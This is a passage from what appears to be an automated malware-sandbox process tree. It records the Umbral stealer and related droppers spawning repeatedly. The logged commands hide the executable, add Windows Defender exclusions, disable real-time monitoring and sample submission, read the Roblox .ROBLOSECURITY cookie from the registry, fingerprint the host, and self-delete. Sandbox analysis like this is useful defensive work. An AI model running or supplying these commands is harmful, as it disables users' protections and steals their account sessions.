C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY59⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption59⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory59⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid59⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER59⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV160⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name59⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause59⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV160⤵
-
-
C:\Windows\system32\PING.EXEping localhost60⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"58⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"59⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"60⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "61⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"62⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"57⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"57⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"58⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"59⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "60⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"61⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"56⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"56⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"57⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"58⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "59⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"60⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"55⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"55⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"56⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"57⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "58⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"59⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"54⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid55⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"55⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'55⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 255⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY55⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY55⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption55⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV156⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory55⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid55⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER55⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name55⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause55⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost56⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"54⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"55⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"56⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "57⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV158⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"58⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"53⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"53⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"54⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"55⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "56⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"57⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"52⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"52⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"53⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"54⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "55⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV156⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"56⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"51⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"51⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"52⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"53⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "54⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV155⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"55⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"50⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"51⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'51⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 251⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY51⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY51⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption51⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV152⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory51⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid51⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER51⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name51⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause51⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost52⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"50⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"51⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"52⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "53⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"54⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"49⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"49⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"50⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"51⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "52⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"53⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"48⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"48⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"49⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"50⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "51⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"52⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"47⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵
-
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"48⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'48⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 248⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY48⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY48⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption48⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory48⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid48⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER48⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV149⤵
-
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name48⤵
- Detects videocard installed
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause48⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\system32\PING.EXEping localhost49⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"47⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"48⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"49⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "50⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV151⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"51⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"46⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"46⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"47⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"48⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "49⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"50⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"45⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"45⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"46⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"47⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "48⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"49⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"44⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid45⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"45⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'45⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 245⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY45⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY45⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption45⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory45⤵
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid45⤵
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER45⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name45⤵
- Detects videocard installed
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵
-
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause45⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV146⤵
-
-
C:\Windows\system32\PING.EXEping localhost46⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"44⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"45⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"46⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "47⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV148⤵
-
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"48⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"43⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"43⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"44⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"45⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "46⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"47⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"41⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"42⤵
-
-
C:\Users\Admin\AppData\Local\Temp\fix.exe"C:\Users\Admin\AppData\Local\Temp\fix.exe"42⤵
-
C:\Users\Admin\AppData\Local\Temp\ыв.exe"C:\Users\Admin\AppData\Local\Temp\ыв.exe"43⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hyperBroker\HQYUReo1f8m.vbe"44⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\hyperBroker\H16DMJb6ExRzQT9HNbwY3XxWipUbF.bat" "45⤵
-
C:\hyperBroker\surrogatehost.exe"C:\hyperBroker\surrogatehost.exe"46⤵
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"C:\Users\Admin\AppData\Local\Temp\fixermachine.exe"40⤵
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"41⤵
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid42⤵
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"42⤵
- Views/modifies file attributes
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'42⤵
- Command and Scripting Interpreter: PowerShell
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 242⤵
- Command and Scripting Interpreter: PowerShell
-
-
